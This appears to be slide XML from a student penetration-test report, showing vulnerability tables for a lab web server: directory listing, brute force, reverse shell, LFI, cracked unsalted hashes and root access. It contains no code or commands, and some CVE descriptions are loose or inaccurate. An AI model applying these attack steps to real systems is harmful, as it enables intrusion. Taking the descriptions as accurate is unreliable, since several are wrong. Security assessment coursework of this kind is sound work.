          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{39E8A0B8-D548-4F6C-8B6F-CEB10D1B410B}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2787500">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2787500">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2787500">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="371135">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dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Description</a:t>
                      </a:r>
                      <a:endParaRPr b="1" dirty="0">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1027809">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200" i="1" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Open Web Port (80) with public access</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200" i="1" u="sng" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>CVE-2019-6579</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1200" i="1" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr sz="1200" i="1"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 sz="1200" i="1" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Port 80 is most commonly used for web communication and if open and unsecure can be succestible to attacks</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200" i="1"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i="1" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>An attacker with network access to the web server on port 80 could execute system commands with admin privileges. Files and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" i="1" dirty="0" err="1">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Folderes</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" i="1" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t> are readily accessible</a:t>
                      </a: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1"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="856503">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Apache Directory Listing</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200" u="sng" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>CVE-2007-0450</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200" u="sng" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF0000"/>
                        </a:solidFill>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 sz="1200" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Allowed attackers to reveal the ip address and the secret folder</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 sz="1200" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Directory traversal vulnerability that allows attackers to read arbitrary files and folders by using / (slash) and trying different folders</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2"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="856503">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Brute-force Attack</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Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>An attack that checks all possibilities for usernames and passwords </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a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>With the use of brute force and a common passwords list (rockyou.txt) the password can be easily found</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3"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="675668">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Reverse Shell Backdoor</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" u="sng" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>CVE-2019-13386</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200" u="sng" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF0000"/>
                        </a:solidFill>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Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Allows to send a reverse shell payload on a web server</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a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Attackers gained remote backdoor access to the Capstone web server</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670317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Vulnerability Assessment</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1082" name="Google Shape;1082;p6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latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>The assessment uncovered the following critical vulnerabilities in the target:</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1083" name="Google Shape;1083;p6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084" name="Google Shape;1084;p60"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2211490738"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="450674" y="976358"/>
          <a:ext cx="8362500" cy="4053690"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{39E8A0B8-D548-4F6C-8B6F-CEB10D1B410B}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2787500">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2783685">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2791315">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="376008">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Vulnerability</a:t>
                      </a:r>
                      <a:endParaRPr b="1" dirty="0">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dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Description</a:t>
                      </a:r>
                      <a:endParaRPr b="1" dirty="0">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1041303">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200" i="1" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Directory Indexing vulnerability</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200" i="1" u="sng" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>CVE-2019-5437 (CWE-548)</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200" i="1" u="sng" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF0000"/>
                        </a:solidFill>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 sz="1200" i="1" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Attacker can view and download content of a directory located on a device. CWE-548 refers to exposure of information through directory listing</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200" i="1"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 sz="1200" i="1" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>The directory listing can compromise private or confidential data</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200" i="1"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1"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="867748">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Local File Inclusion (LFI)</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200" u="sng" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>CVE-2021-31783</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200" u="sng" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF0000"/>
                        </a:solidFill>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 sz="1200" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>LFI is a vulnerability in poorly designed web applications. This allows users to upload content into the application or servers</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 sz="1200" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>An LFI vulnerability allows attackers to upload malicious payloads</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2"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="867748">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Other user’s credentials found when logging on with a different user</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" u="sng" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>CVE-2020-24227 (CWE-522)</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200" u="sng" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF0000"/>
                        </a:solidFill>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Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Storing a username and/or password in plain text that is not encrypted</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a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Ashton had Ryan’s name and password hash which enabled further penetration into system and the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>webdav</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3"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="694193">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Weak Hashed Passwords</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Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Unsalted hashed passwords can be easily cracked with resources</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a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>With crackstation.net we were able to crack Ryan’s password and upload a payload</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Vulnerability Assessment</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1082" name="Google Shape;1082;p6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latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>The assessment uncovered the following critical vulnerabilities in the target:</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1083" name="Google Shape;1083;p6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084" name="Google Shape;1084;p60"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4253120252"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="450674" y="976358"/>
          <a:ext cx="8362500" cy="3904499"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{39E8A0B8-D548-4F6C-8B6F-CEB10D1B410B}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2787500">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2783685">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2791315">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="376008">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Vulnerability</a:t>
                      </a:r>
                      <a:endParaRPr b="1" dirty="0">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dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Description</a:t>
                      </a:r>
                      <a:endParaRPr b="1" dirty="0">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1041303">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200" i="1" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Simple Usernames</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200" i="1" u="sng" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF0000"/>
                        </a:solidFill>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 sz="1200" i="1" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Short names, first names </a:t>
                      </a:r>
                      <a:endParaRPr sz="1200" i="1"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 sz="1200" i="1" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Ashton, Ryan, and Hannah are all simple usernames a</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" i="1" dirty="0" err="1">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>nd</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1200" i="1" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t> can be easily obtained</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200" i="1"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1"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="867748">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Root Access</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200" u="sng" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF0000"/>
                        </a:solidFill>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 sz="1200" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Privileged access to resources and abiity to perform admin functions on a machine</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a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Vulnerabilities can be </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>leveralaged</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t> and further potential impacts to a connected network</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2"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="867748">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>WebDav</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
